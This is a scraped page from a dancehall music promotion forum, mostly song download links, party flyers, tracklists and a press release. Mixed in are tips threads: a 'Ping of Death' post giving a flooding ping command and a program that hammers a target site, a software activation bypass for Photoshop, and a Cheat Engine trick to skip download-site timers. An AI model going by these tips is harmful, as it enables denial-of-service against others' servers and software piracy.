Forum: Promote

Promote new releases, new/upcoming artistes, events, contests, websites, etc...

Google Trick [Super Cool]

August 7, 2010
Started By CRAZY-CHICKEN7 Comments
Try this out.....

1. Go to Google
2. Click images
3. Type "flowers, cars, bikes" or any other word.
4. You will get a page which is having full of images
5. Then delete the URL from the address bar and paste the below script and hit enter

javascript:R= 0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI= document.images ; DIL=DI.length; function A(){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math. sin(R*x1+ i*x2+x3)* x4+x5; DIS.top=Math. cos(R*y1+ i*y2+y3)* y4+y5}R++ }setInterval('A()',5); void(0)
27520_316515584587_807_n.jpg

click here

listen n tell mi what u think

TALK ABOUT THURSDAYS!!

60270_118946578160374_100001350981869_119189_7264400_n.jpg

Talk About Vybz..NO STREET
Talk about Everybody free before 11
Talk about cheap..$400 after 11
Talk about Food inclusive..yes food
Talk about girls
Talk about entertainment from Talked About DJs

TALK ABOUT CLICK presents "TALK ABOUT THURSDAYS"

Not competing but taking OVA!

An event once a month on the last Thursday
Where College meets the real world
Where 'BOY MEETS GIRL'

So much things to TALK ABOUT...but only ONE EVENT

Sept 30 @ 9:00 pm

Talk About DJs include

Renaissance
Bunco
Alonzo Hawk
Chris Diamond
DJ Shampoo
DJ Xten
Bushman Ent

COMING THIS AND EVERY LAST THURSDAY..AND MAYBE A FRIDAY..WHO KNOWS????

WHERE WILL YOU BE????
BE SOMEWHERE THAT'S TALKED ABOUT

REBEL T HEADQUARTERS @ EASTWOOD PARK

JOIN THE GROUP AND FAN PAGE BELOW:
BE APART OF THE MOVEMENT

GROUP PAGE:

http://www.facebook.com/group.php?gid=108607792525610

FAN PAGE:

http://www.facebook.com/pages/Talk-About/151297278223990?ref=ts

-- Edited by Pimping on Saturday 18th of September 2010 05:59:20 PM
TRACKLIST

WANT ME INTRO
MAVADO - KNOW YOU WANT ME
CHARLEY - FALL IN LOV AGAIN
TNEZ - ME SHE LOVE
CARDIAC BASS INTRO
KARTEL - SHE HOLDIN ON
I OCTANE - IN MY ARMS
JAH CURE - BEFORE II LEAVE
CECILE - WHEN YOUR GONE
CHRIS - PAPER LOVIN
KARTEL- AH LIKE THAT
PRESSURE - DO ME RIGHT
SAD STORY INTRO
TAMMI - FORBIDDEN LOVE
PROTOJE - ROLL
UNKNOWN - NAME AND NUMBER
UNKNOWN - SEND ME AN ANGEL
ALAINE - SLIPPING AWAY
PRESSURE - WAITING
PEETAH - HURTING
UNKNOWN - PERFECT LOVE
BUJU - FRIEND
TAMMI - NOTHING ELSE
UNKNOWN - LOVE
SANJAY - SLIPPING AWAY
COLLIE BUDZ- NOW SHE GONE
SHONTELLE - PIECES
DUANE - FOREVER YOURS
VOICEMAIL - GROW OLD WITH YOU
SEAN PAUL - HOLD MY HAND
ALAINE - LOVE LOUD AND CLEAR
KIBAKI - HEART BEAT
LADEN - FEELING
SAVAGE - GOOD GIRL
SHONTELLE - FALLING
HYAH SLICE - YOU ARE
DAMAGE - TING DEH
LUTAN - ALL NITE
TOK - HEY GIRL
TURBULENCE - ALONE
DARRIO - FEEL GOOD
MONSTER TWINZ - LOVE YOU
PRESSURE - COMING RIGHT BACK
CECILE - TONIGHT
TIFA - WISH
WAYNE - I NEED TO KNOW
DON CORLEONE - MOVING ON
DENYQUE - THAT PLACE
ALAINE - LOVE OF A LIFE TIME
SANJAY PERFECT STRANGERS
JAH CURE - MILLION MILES
JAH CURE - NEVER FIND
MITCH - GIVE ME A CALL
ALAINE - ME AND YOU
GYPTIAN - LOVE IS HARD

tell mi if you like

Artist: CALI P
Songs: Wine Up (Burn up Riddim) / Shining Light (Ovaseaz Riddim)
Label: Hemp Higher & Fras Twinz
Directed and Edited by: Addictive Image & Brainfood Films.

Blast that link plz!...
Can you 1st test it... by downloading the link and making sure it works...

GIVE THANKS!

http://www.megaupload.com/?d=VK0BBF5I < - - - - - Download Link

HIGH QUALITY VERSION FOR TV AND BROADCASTING.......

http://www.megaupload.com/?d=VK0BBF5I < - - - - - - Download Link

listen tracks from mad kick before downloading: http://www.youtube.com/watch?v=Y9uOtfjhgnk

Mad Kick Rhythm Driven Artist

1.      Anthony B

2.      Beennie Man

3.      Blacker

4.      DAngel

5.      Donna Makeda & Chatta

6.      Ghost

7.      Lady Saw

8.      Lady Shelly aka Karamanti

9.      Macka Diamond

10.  Movado

11.  Queen Ifrica

12.  Rich Kid & Ghost

13.  Rich Kid & Mzminray

14.  Richie Stephen

15.  Serani & Bugle

16.  Shacka  Pow

17.  Tony Curtis

18.  Vybz  Kartel & Ms Triniti

19.  Voice Mail

the return of the remix contest... number 27 is here...

as usual, here are the rules:

* every1 can chose one (or more) of the riddims below
* remix it, and post it in a new comment
* after those rmx poll will be activated
* use any acapella u want
* megamix allowed
* use as less sound fx as possible

* CREATIVITY WINS

* pls drop a comment first so we know who tek part ina dis round (after dat poll will be activated)...

RIDDIMS:

-- Edited by massive vybe (Mod) on Tuesday 22nd of September 2009 12:07:27 PM

-- Edited by massive vybe (Mod) on Thursday 22nd of October 2009 02:21:33 PM

-- Edited by massive vybe (Mod) on Sunday 8th of November 2009 09:16:01 AM
Artist: CALI P
Songs: Wine Up (Burn up Riddim) / Shining Light (Ovaseaz Riddim)
Label: Hemp Higher & Fras Twinz
Directed and Edited by: Addictive Image & Brainfood Films.

Blast that link plz!...
Can you 1st test it... by downloading the link and making sure it works...

GIVE THANKS!

http://www.megaupload.com/?d=VK0BBF5I < - - - - - Download Link

HIGH QUALITY VERSION FOR TV AND BROADCASTING.......

http://www.megaupload.com/?d=VK0BBF5I < - - - - - - Download Link
Introducing Dami D
Title: Enemy a Penny me (Clean)
Genre: Dancehall
Year: 2010

http://www.mediafire.com/?egv5tcu4jbxjevt

Preview Video on Youtube CLICK HERE

Also check this video out Wasp & Dami D - Struggle

-- Edited by dj_duff on Thursday 19th of August 2010 02:50:12 PM
NEW ARTIST SIIIICKKK 

TELL MI WHA YUH TINK
IMORTANT ++++++close all other application before this process+++++
!!!!!!!!!!!!!!!!!!!!!!!!
before do this you should make

++++++ EMPTY YOUR RECYCLE BIN ++++++

after the instalation, right click on photoshop >open file location >

DELETE THESE FILES namedAdobeUpdater.dll-ACE.dll

++++++close the photoshop completely+++++again try to open photoshop !!!
now you will get an error message and the photoshop will not run !!!!!!!
close the
message window !!!!!!!

!!!! open the recycle bin !!!!

!!!!restore the deleted files from the photoshop diectory.!!!

!!..now you will get a clean opening for cs2!!!!!!!!!

-- Edited by NoKTurnaL on Tuesday 14th of September 2010 05:01:10 AM

djkris

September 9, 2010
Started By djkris0 Comments
hey zone fans i just like to big up media zone and to tell you all know i soon post the waan buss riddim from the waan buss family record crew the news studio down here in trelawny okay so wen i post it asking you all to suppost it okaycpcpcpcpcpcp

Nefatari Goes Strong on the ICE RIDDIM

September 8, 2010
Started By GA0 Comments

FOR IMMEDIATE RELEASE

September 7th, 2010

Nefatari Goes Strong on the ICE RIDDIM

US based artist Nefatari has one of the most popular songs in international nrotation on the ICE Riddim, produced by Digiplay. Various up and coming artistes have voiced on the riddim, which also features artists such as Munga, Erup, Charly Black and Kym. With especially also Erups chart success with Pop the Bottle the ICE Riddim has gained even more momentum.

Nefetaris song All The Boys has been in steady rotation since the riddim has been released internationally and is available on Itunes and other online outlets.

The young songstress from LA is of Jamaican descent and has started her musical career based in the US. As a model, songwriter and singer this young beautiful lady is set to make an impact on the Jamaican music scene as well.

Her gifts and talents have propelled her into dancing, modeling, acting and music. She is a singer/songwriter who easily takes center stage to woo her audience. A vivacious performer and expert dancer, Nefatari has already turned heads at Plumm nightclub (NYC), and P. Diddys Justins restaurant performing in his Digital Divas Showcase and won a spot to perform at the world famous Apollo Theatre. She was chosen to perform

at Alonzo Mourning, Donald Trump and Shaquille ONeals Annual Golf Tournament, Ashford & Simpsons Sugar Bar in NYC and Brooklyn Fashion Weekend (three seasons in a row). Nefatari most recently performed with multiplatinum recording artist Shaggy at Clippers II nightclub in Queens, NY. She has studied with songwriting/producing legend, James Mtume and with Grammy award winning voice coach, Gwen Conley and worked with a production camp under John Eaton and Tony Woodruff, (Notorious B.I.G.

and P. Diddys No Way Out album) she wrote and vocalized songs shopped for JLos album, This is Me, This is Then and has also been a back up singer for Lindsey Lohan. Already, her distinctive style has landed her on the pages of VOGUE MAGAZINE, WWD, and GLAMOUR MAGAZINE. She has appeared in various ads for Dell

Computers, Sisters in Style magazine, Hype Hair, and on the runway for Tommy Hilfiger.

The ICE Riddim is Nefataris first venture into the Jamaican reggae industry as a recording artist and, according to producer Digiplay, a remix for All The Boys has already been confirmed with a major female dancehall DJ. More information about the remix will follow!

Nefatari is available for phone interviews and will be in Jamaica end of September. For more information on the ICE Riddim as well as the download link if you still need it please contact me any time on digiplayja@gmail.com

Link to "All the Boys on  ITUNES: http://itunes.apple.com/us/album/ice-riddim-for-the-dancehall/id385456595

Trigga on Gyal Segment Riddim.

DOWNLOAD LINK: http://www.mediafire.com/?amtoobb3dl418xx

For more music check: reverbnation.com/weaponxintl

MSN: uknoitztrigga@hotmail.com
FB: Shawn Trigga Murgasen
Twitter: UKNOiTZTRiGGA
DJ CESS MIX PLAYING NOW ON www.ramjamxrated.com USE PLAYER IN TOP RIGHT CORNER AND MUTE PLAYER IN BOTTOM LEFT CORNER>>>>>>>>>>>>>>>>..

ENJOYpy1
http://www.mediafire.com/?53m5g256g8baf91http://web17.twitpic.com/img/156716871-086896849269ae510ae2375ccb188a56.4c82cf70-scaled.jpg

-- Edited by djharry on Saturday 4th of September 2010 05:54:25 PM

SHANE-E AND KG-9 AKA HYPORAK- GAL A ASK FI US (FUTURE PRODUCTIONS)

http://www.mediafire.com/?l0v2mbijngy

FOR BOOKINGS CALL: 876- 294-6461
futureproductionsja@yahoo.com

-- Edited by Mr Future on Saturday 4th of September 2010 02:32:57 PM
GALLIS FROM BIRTH - SUPA TWITCH KARIM HYPE & NASHEEN

-- Edited by JAHLION MOVEMENTS on Saturday 4th of September 2010 04:49:42 PM

Sir Ninja Ford_-_ Gwan Talk

September 4, 2010
Started By spydahlynch2 Comments
NEW SINGLE FROM DANCEHALL ARTIST NINJA FORD AKA SIR FORD..........LISTEN UP CAUSE THIS ONE IS HOT DEMEON BIGG UP KEEP THE PRIDUCTIONS FLOWING!!!!!!!

http://www.myspace.com/ninjaford
http://www.myspace.com/ftp340

http://www.mediafire.com/?fpoq4ro08csfxe5

TRISTON 5 STAR - GAL YUH WANT MI - SILKY SMOOTH RIDDIM
PRODUCED BY PUDDY SUSPECTZ

DOWNLOAD

http://www.mediafire.com/?j79dqh3iqqq5l2a

http://www.box.net/shared/xy01zncznz

-- Edited by Suspectz_Int on Friday 3rd of September 2010 11:02:03 PM
http://www.mediafire.com/?gqye6n95rkp0ant
http://www.mediafire.com/?c9b9aw8vk7v75wb
nh
http://www.sendspace.com/file/wblp78

WINKY D-MI NEVER(AUG 2010)

August 31, 2010
Started By mninja0 Comments
http://www.sendspace.com/file/k09aot

Ky-Enie & Peter Tosh - Vampire
(Platinum Camp Prod)

http://www.mediafire.com/?084af6jq8j4kv4o

check this out new artiste on the scene....
http://www.myspace.com/damasmusic876l_de4f62209c4f835f7a9986ce259fa5ab.jpg

Download Check it out
http://www.mediafire.com/?d9cjduhs01v16fr

Ky-Enie & Andi Ites - Govern Di Place, Everywhere
(Eminem - Lose Yourself Riddim)

http://www.mediafire.com/?8mjof9aphjjm4sv

PoD (PING OF DEATH)

September 25, 2008
Started By xForcex9 Comments
Start => Run
Type cmd and press Enter
Type=> ping www.google.com
_______Start => Run
Do as i told you, type cmd and then type
ping /?
and you'll get a full list of commands. Ultimate ping, called PoD( Ping Of Death )
ping <target> -t -l 65500
ping = send bytes to the specific target
<target> = i.e www.google.com , 127.0.0.1
-t = It will go on forever till the target will stop sending you answers.
-l 65500 = size, -l declares size and 65500 is the maximum. You can also make an "virus" for something like a ping.

Make a new VB project and on form_load you put:

Shell ("C:\Program Files\Internet Explorer\IEXPLORE.EXE http://www.google.pt")

Replace http://www.google.pt by your target and put that like 10000 times.

Whoever opens it will make a sort of ping to the site.

BE VERY CAREFULL DOING THIS

RAPIDSHARE TIME HACK (easy)

May 6, 2009
Started By AJ23 Comments

1 download cheat engine from this website...
Code:

Spoiler
http://cheatengine.org/downloads.php

(its free and clean)

2 open up firefox (or any IE browser)

3 open up cheat engine

4 click the flashing icon in the top left and find process firefox (or whatever internet browser your running)

5 check the box that says speed hack and change it to a higher number (around 6ish)

6 go download something from rapid share or most other download sites and when it makes you wait the time will go really fast.... enjoy!!

How To Make Download Faster

May 18, 2008
Started By Spade62 Comments
If you're using Firefox then go to http://www.downthemall.net/ and install it.

Red Dragon Mixtape

August 28, 2010
Started By dre rulz0 Comments
http://www.megaupload.com/?d=3RY6HONL

Unlock all Huawei modems

August 27, 2010
Started By Dowain0 Comments
call 8556616 to unlock your huawei modems in jamaica, to work with any network.
SICK UP - GET OVA YOU
http://www.mediafire.com/?598pqdb076vsk88
«First  <  124 25 26 27 2898  >  Last»  | Page of 98  sorted by